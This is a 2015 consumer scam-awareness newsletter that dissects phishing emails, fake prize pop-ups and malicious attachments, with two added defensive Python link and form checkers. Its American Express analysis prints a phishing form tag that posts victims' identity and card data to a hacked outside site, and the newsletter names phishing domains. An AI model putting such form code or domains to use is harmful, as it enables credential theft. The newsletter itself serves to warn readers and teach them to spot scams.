
December 1, 2015

THE WEEK IN REVIEW

We are really sick and tired of seeing and hearing two words. Can you guess what they are? We’ve seen at least a hundred scams with these two words together in the subject line or at the top of an email. Add these scams to the many hundreds of legitimate ads containing these two words and we’re done! Still can’t guess? Black Friday! Criminal gangs were trying really hard to sneak their scams into your inboxes amongst the legitimate advertisers. In fact, it was so bad during the past week that we made Black Friday this week’s Top Story (and threw some of the subject lines and email addresses into the lists below).

URGENT WARNING: At the end of the week, we discovered that criminal gangs targeted people with newly created phishing scams designed to look like emails from Google.  All seemed to come from the address noreply@googlequery.co.uk.  We will report more fully on this scam in next week’s edition.

 

Sample Scam Subject Lines:

[UPDATE] Military Discussing Technology Release

Add egg protein to your foods quickly

Ditch- Coffee – For– This Super Natural Nutrient– From The Ocean

Do dust–pet -dandruff–and pollen — leave your family feeling miserable?

Don’t climb dangerous ladders to light your home

End of Season Patio Sale

Ending Friday Your CVS $50

Golf Video – See the “Straight Arrow” Swing

One trick to make Christmas magical

Re: Your CVS Black Friday $50 Credit

Re: Your Kohl’s Black Friday $50 Gift

See Online Deals on Electronics

Slash Your Gas-Bill by 80%

US News – Diabetes It’s a Lie

Sample Scam Email Addresses:

BlackFridaySavings@centransfer.download

CompareVALoans@drolly.top

CopperwearKneeReview@dovermar.space

EasyShedPlans@juanburma.date

EmailMarketing@diaghi.top

Holiday-Special@bkiti.top

LowCostMovers@easton.top

LungCancerTreatmentGuide@confering.top

PackagesFromSanta@crestria.top

SamsClubBlackFriday@cuteem.top

TimeShareSales@reptical.top

Walmart@cmspi.top

 

 

 

 

Phish NETS: Chase Online, PayPal and American Express

We saw a big jump in phishing scams during the last week after a few quiet weeks. Yes, the criminals are targeting the three top targets: PayPal, American Express, and Apple. (We didn’t report on the Apple phishing scam below.) They’ve also targeted Chase Bank. Fortunately, recipients of the Chase Online phishing scam should be suspicious immediately because the email was sent from no-reply@che.com, not chase.com. Che.com is a strange website hosted in Zhechiang, China. And a simple mouse-over of the link “Log on to Chase Online” shows that it points to a website called akhirzaman.org, a religious website in Indonesia that has probably been hacked. Just out of curiosity we checked with VirusTotal.com about this Indonesian website and their results were clear. Stay away!

Now delete.

 

2-Phish-logon to chase online Vtotal

Once again PayPal was targeted in the next two phishing scams. It is obvious that neither of these emails came from paypal.com. The first came from service@servicelimited.info and the second from customer@com-information.info. Like the phishing scam above, a mouse-over of the first easily revealed that the scam pointed to the strange domain resolve.apk-limited.com, not paypal.com.

3a-PayPal-your account has been limited

However, a mouse-over of the link “Continue” in this 2nd phishing scam is harder for inexperienced netizens to see through. The link points to www.paypal.com.com-signin.info. This link is cleverly meant to appear like it is paypal.com but it is not. If you understand the domain naming system you know that the domain (and global top level domain) in this link is actually com-signin.info. A WHOIS lookup of this domain shows that it was registered on November 27 (the day the email was sent) through a proxy service to hide the real owner’s name. The “paypal.com” at the start of the link name actually represents two subdomains. A domain owner can create any subdomain he/she wants and this one cleverly tried to fool people into thinking the link pointed to the domain paypal.com. Hopefully recipients were very suspicious when they read the email content and saw grammatical and sentence construction errors. How many can you spot?

3b-Paypal login on your account
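The mouse-over check described above can be done mechanically. The following Python sketch is an added example, not part of the original newsletter: it reads a host name from right to left to find the domain that was actually registered and compares it with the brand the email claims. The function names and the small suffix table are assumptions made for illustration; a production tool would use the full Public Suffix List.

```python
from urllib.parse import urlsplit

# Assumption: a tiny stand-in for the Public Suffix List, covering only the
# two-label suffixes that appear in this newsletter.
MULTI_LABEL_SUFFIXES = {"co.uk", "com.tn"}


def registrable_domain(host):
    """Return the part of a host name that somebody actually registered."""
    labels = host.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def check_link(url, brand_domain):
    """Compare a link's real destination with the brand the email claims."""
    host = urlsplit(url if "//" in url else "//" + url).hostname.lower()
    registered = registrable_domain(host)
    subdomains = host[: -len(registered)].rstrip(".")
    genuine = registered == brand_domain
    return {
        "host": host,
        "registered": registered,
        "genuine": genuine,
        # True when the brand appears only as subdomain labels, the trick
        # used by www.paypal.com.com-signin.info.
        "brand_in_subdomain": not genuine and brand_domain in subdomains,
    }


if __name__ == "__main__":
    # Hosts quoted in the newsletter; the scheme and path are constructed.
    for link in ("http://www.paypal.com.com-signin.info/",
                 "http://resolve.apk-limited.com/",
                 "https://www.paypal.com/signin"):
        print(check_link(link, "paypal.com"))
```
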

Next was another mediocre attempt trying to phish American Express accounts. The link for “View message” points to a daycare center website in Australia that has been hacked.

4-American Express -you have a new message

Finally, below is the most dangerous phish of the week, and it targeted American Express users again. You’ll notice that the email doesn’t contain a single website link and comes from a domain that sounds like it could belong to American Express but it doesn’t. The email was sent from aexp.com (though we don’t display that below). The attached file at the bottom of the email is a web document (.htm and .html files are web documents). We downloaded it and looked inside the code in the html document. The criminals ask for the following information from you in this web document:

“You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card”

Your name

Date of birth

Social Security number

Mother’s Maiden Name

Mother’s Date of Birth

Mother’s Place of Birth

Security pin

User login ID

Password

15 Digit Card Number

Expiration Date

4-Digit security code

Current Email address

Email password

Can you imagine providing this type of personal information to anyone? …especially criminals? There are two things about the email that should raise your suspicions. Can you find them? (Answer at the bottom of this column.) We’re certain that the criminals who created this phishing scam have created others that we’ve reported on in the past year. We say this because their html code calls for images found deep on a hacked website in Portugal called jpmmotos.pt that we’ve identified in the past. Do you wonder where your precious data is being sent after hitting Submit in that html file? The file will post your information using this snippet of code. Can you find and figure out the 2-letter country code?

<form method="post" action="http://www.equipements-pro.com.tn//highslide/img/up-date.php" x_onsubmit="check(this.form)">

Your precious data will be sent to a hacked website called equipements-pro.com.tn. It is a website in Tunisia.

Delete!
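The same inspection of an HTML attachment can be automated before anyone opens the file. The Python sketch below is an added example, not code from the newsletter or from the phishing file: it lists every form in an attachment, the host the form submits to, that host's final label (the country code in this case), and whether a password field is requested. Only the form tag in the sample is taken from the snippet above; the input fields and all class and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormAudit(HTMLParser):
    """Collect each form's submit target and the named fields it asks for."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms and a.get("name"):
            kind = (a.get("type") or "text").lower()
            self.forms[-1]["fields"].append((a["name"], kind))


def audit_attachment(html_text):
    """Summarise where an HTML attachment would send what the user types."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        host = urlsplit(form["action"]).hostname  # None for a relative action
        findings.append({
            "posts_to": host,
            "tld": host.rsplit(".", 1)[-1] if host else None,
            "cleartext": form["action"].lower().startswith("http://"),
            "wants_password": any(k == "password" for _, k in form["fields"]),
            "field_names": [n for n, _ in form["fields"]],
        })
    return findings


# Constructed sample: the form tag is the one quoted in the newsletter,
# the input fields are made up to stand in for the real attachment.
SAMPLE = """<html><body>
<form method="post" action="http://www.equipements-pro.com.tn//highslide/img/up-date.php" x_onsubmit="check(this.form)">
<input type="text" name="ssn">
<input type="password" name="email_password">
<input type="submit" value="Submit">
</form></body></html>"""

if __name__ == "__main__":
    for finding in audit_attachment(SAMPLE):
        print(finding)
```
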

Two reasons to be suspicious about the above email besides the attached html file…

  1. Grammatical error in the first paragraph
  2. The email is missing any personal information identifying you as the recipient, especially the last 4 digits of your account number

Your Money: Free iPhone 7

“CONGRATULATIONS! Your was randomly selected to test the brand new iPhone 7!” One of our readers sent us the screenshot below, taken on her iPhone, which she immediately and correctly identified as a scam. Who gives away iPhones? And the iPhone 7 is not thought to be coming out until the summer of 2016. So what’s going on here?

Notice the scammy website name at the top? Best-iphone6s.com. Google cannot find any such website for this domain, though the domain was registered with Enom on September 19th using a proxy service called WHOISGuard in Panama to hide the owner’s identity. (See the WHOIS record.) What makes this web page potentially dangerous is that you are presented with two choices… Yes and No. But on a mobile device, such as an iPhone or Android phone, it is very difficult to identify malicious intent. Clicking either choice could install malware on your phone. It’s important not to click on either of the choices! If this pop-up happens to you, quit your browser without clicking anything. Next, go to your settings and clear out your browser cache. If you have an iPhone go to Settings > Safari > Clear History and Website Data.

A simple search for “Your was randomly selected to test the brand new iPhone 7” finds that many other people have reported these scams across the world, from Canada to Germany. Here are a couple more screenshots provided by Reddit users in this discussion thread: https://www.reddit.com/r/RelayForReddit/comments/3m8r9v/horrible_intrusive_and_annoying_ad/

7-iphone ad popup

8-iPhone ad popup 2

People on the Apple Discussion Boards have also been discussing these scams since July and as recently as last week. Visit https://discussions.apple.com/thread/7143380

Check out the number of links in a Google search for the above phrase during just the last month.

 

TOP STORY: Black Friday Deals that are Not

The criminal gangs that target us use many tricks to engineer a click. One of their standard tricks is to pitch their scams disguised as the holiday-du-jour special. Halloween, Valentine’s Day, Christmas, and of course, Black Friday. Each of the emails below is meant to mislead recipients into thinking that they have an opportunity to take advantage of fantastic Black Friday deals. But they are all just wolves in sheep’s clothing and they are only a small sampling of the scams that targeted inboxes during the week before November 27. The first email is funny because it is trying to appeal to several holidays… Black Friday, Christmas, and Cyber Monday.

By the way… Should you ever receive emails you suspect are scams, never click on the “opt-out” option offered at the bottom of the email to stop more from being sent. Clicking “opt-out” is actually more likely to result in a computer infection or an increase in scam emails because you’ve just confirmed that you are a real person and will open their scams. For more information about unsubscribe scams read our article Unsubscribe Me Not!

9-Black Friday Amazon reward

10-Black Friday deals on electronics

11-Black Friday everyday deals

12-Black Friday Walgreens reward

FOR YOUR SAFETY: Resume Attached from 163.com

We had never heard of 163.com until last week when it came to our attention from people who received the short, but dangerous emails below. 163.com is owned by NetEase, a China-based Internet company. As you can guess, each of the documents attached to the emails contains malware that will cause a computer infection. English is not the sender’s first language and all three were created and sent by the same scammer.

Delete!

 

 

14-Attach is my resume 2

15-Attach is my resume 3

 

 

ON THE LIGHTER SIDE: Good News From… Everyone???

We’re pleased to report that we have good news… again! We’re just not sure who to thank. Obviously our first thought was to thank “David Alder,” the sender of the email. But then we see that the news comes from, and is signed by, Ban Ki-Moon of the United Nations. So it would be appropriate to thank Mr. Ki-Moon. But we’re also told that this good news is all because of the “exit of” former U.S. Treasury Secretary Mr. Timothy Geitner and former FBI Director Robert Mueller. Should we thank them too? And we’re supposed to reply to banki4un@secretary.net. Oh well, we’ll thank them all and then wait for our $4.5 million dollars to arrive.

 

Until next week, surf safely!